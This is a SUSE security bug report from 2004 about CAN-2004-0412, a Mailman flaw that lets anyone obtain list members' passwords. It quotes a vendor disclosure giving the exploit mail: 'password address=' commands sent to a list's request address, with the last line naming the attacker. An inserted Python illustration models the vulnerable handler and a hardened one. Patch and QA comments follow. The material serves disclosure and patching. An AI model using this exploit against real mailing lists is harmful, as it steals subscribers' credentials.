Bug 55868 (suse40868)

Summary: mailman password stealing
Product: [Novell Products] SUSE Security Incidents
Component: Incidents
Status: RESOLVED FIXED
Severity: Major
Priority: P3 - Medium
Version: unspecified
Target Milestone: ---
Hardware: All
OS: Linux
Reporter: Sebastian Krahmer <krahmer>
Assignee: Heiko Rommel <heiko.rommel>
QA Contact: Security Team bot <security-team>
CC: dmueller, security-team
Whiteboard:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Attachments: the patch, patchinfo for box

Description Sebastian Krahmer 2004-05-19 20:21:29 UTC
From: Mark J Cox <mjc@redhat.com>
To: vendor-sec@lst.de
Cc: barry@python.org, jdennis@redhat.com
Subject: [vendor-sec] CAN-2004-0412 Mailman password stealing

We noticed a security flaw mentioned in Mailman as part of the 2.1.5 
release.  See:
http://mail.python.org/pipermail/mailman-announce/2004-May/000072.html

I tracked down the issue this morning and worked out an easy exploit:

Send the following email (From: address doesn't matter)

--
To: fedora-devel-list-request@redhat.com

password address=markcox@gmail.com
password address=mjc@redhat.com
--

This will cause mailman to send the fedora-devel-list mailman password
belonging to markcox@gmail.com (victim) to mjc@redhat.com (attacker).  
mjc@redhat.com doesn't have to be a subscriber to the list. Therefore you
can effectively steal the passwords for any subscribers if you know who is
subscribed.  You can add in more "password address=victim"  lines before
the final line to retrieve multiple passwords (leaving the last line
intact pointing to you, to make sure that final email gets sent to you)

Patch for just this issue extracted from the big 2.1.4-2.1.5 diff is
attached.  Barry has confirmed this is correct.

This issue doesn't seem to affect 2.0.13 (the function ProcessPasswordCmd
in MailCommandHandler.py doesn't let you switch users).

Anyway, this is public, but no one seems to have noticed so I allocated
CAN-2004-0412 to it anyway.  If Debian or FreeBSD noticed and allocated a
name please reply on list asap.
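The command-processing flaw the report describes, modelled in Python beside a hardened form. This is an added illustration for this page, not Mailman's own code and not part of the bug report or the attached patch: the subscriber table, the addresses, the reply-routing structure (`Results.returnaddr`) and the acknowledgement wording are constructed assumptions. The vulnerable handler re-targets the single reply mail to whatever address the last `password address=` line names, so passwords looked up by earlier lines ride along to an address that need not be a member; the hardened handler delivers each reminder only to the address it belongs to and gives the sender a membership-neutral acknowledgement.

```python
import re
from dataclasses import dataclass, field

# Constructed subscriber table for a hypothetical list; the addresses and
# passwords are made up for this illustration.
SUBSCRIBERS = {
    "victim@example.org": "s3cret-victim",
    "other@example.org": "s3cret-other",
}

# Mail-command syntax modelled here: "password" alone, or "password address=<addr>".
CMD_RE = re.compile(r"^password(?:\s+address=(\S+))?\s*$", re.IGNORECASE)


@dataclass
class Results:
    returnaddr: str                      # where the single reply mail goes (assumed structure)
    out: list = field(default_factory=list)


def parse_commands(sender, body):
    """Yield the address each 'password' command refers to (the sender when no
    address= argument is given), in the order the lines appear in the body."""
    for line in body.splitlines():
        m = CMD_RE.match(line.strip())
        if m:
            yield (m.group(1) or sender).lower()


def handle_password_vulnerable(sender, body):
    """Model of the flawed behaviour: each 'password address=X' line both looks
    up X's password and re-targets the single reply to X, member or not.
    Lines are processed in order and the reply goes to the address named
    last, so earlier lookups are delivered there.  Returns (recipient, lines)."""
    res = Results(returnaddr=sender)
    for addr in parse_commands(sender, body):
        res.returnaddr = addr            # the flaw: reply re-targeted by every command
        pw = SUBSCRIBERS.get(addr)
        if pw is None:
            res.out.append(f"{addr} is not a member of the list")
        else:
            res.out.append(f"Your {addr} password is: {pw}")
    return res.returnaddr, res.out


def handle_password_fixed(sender, body):
    """Hardened model: a reminder for X goes only to X, never to the address
    that sent the command, and the sender gets the same acknowledgement
    whether or not X is subscribed, so the command cannot be used to
    enumerate members either.  Returns {recipient: [lines]}."""
    responses = {}
    for addr in parse_commands(sender, body):
        pw = SUBSCRIBERS.get(addr)
        if pw is not None:
            responses.setdefault(addr, []).append(f"Your {addr} password is: {pw}")
        responses.setdefault(sender, []).append(
            f"If {addr} is subscribed, a reminder has been sent to that address.")
    return responses


def password_leaked_to_non_owner(responses):
    """True if any reminder line carries a password that does not belong to
    the recipient it is being delivered to."""
    for recipient, lines in responses.items():
        for line in lines:
            if "password is:" in line and not line.startswith(f"Your {recipient} "):
                return True
    return False


# The attack mail from the report with constructed addresses: the attacker is
# not a subscriber, and the last line points the reply at the attacker.
ATTACK_BODY = """\
password address=victim@example.org
password address=attacker@example.net
"""

if __name__ == "__main__":
    to, lines = handle_password_vulnerable("anyone@example.com", ATTACK_BODY)
    print("vulnerable: reply goes to", to, "carrying", lines)
    print("fixed:", handle_password_fixed("anyone@example.com", ATTACK_BODY))
```

Running the vulnerable handler on the constructed attack body shows the victim's password in a reply addressed to the attacker; the hardened handler produces one mail per owner and two neutral acknowledgements to the sender, and `password_leaked_to_non_owner` reports a leak only for the former.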
Comment 1 Sebastian Krahmer 2004-05-19 20:21:29 UTC
...
Comment 2 Sebastian Krahmer 2004-05-19 20:22:16 UTC
Created attachment 19921 [details]
the patch

...
Comment 3 Heiko Rommel 2004-05-24 20:36:23 UTC
I can confirm the efficacy of both the exploit and the suggested fix.
Doing checkin right now. Affected distris are 8.2, 9.0 and 9.1.
Security team, please provide a patchinfo ;)
Comment 4 Sebastian Krahmer 2004-05-24 20:44:28 UTC
Created attachment 20122 [details]
patchinfo for box

...
Comment 5 Sebastian Krahmer 2004-05-24 20:44:52 UTC
Patchinfo submitted, please tell suse-dist.
Comment 6 Heiko Rommel 2004-05-24 20:55:35 UTC
Done.
Comment 7 Sebastian Krahmer 2004-05-26 20:01:49 UTC
Approved package. It was SL only, so no QA.
Comment 8 Heiko Rommel 2004-05-27 19:10:37 UTC
*** Bug 56294 has been marked as a duplicate of this bug. ***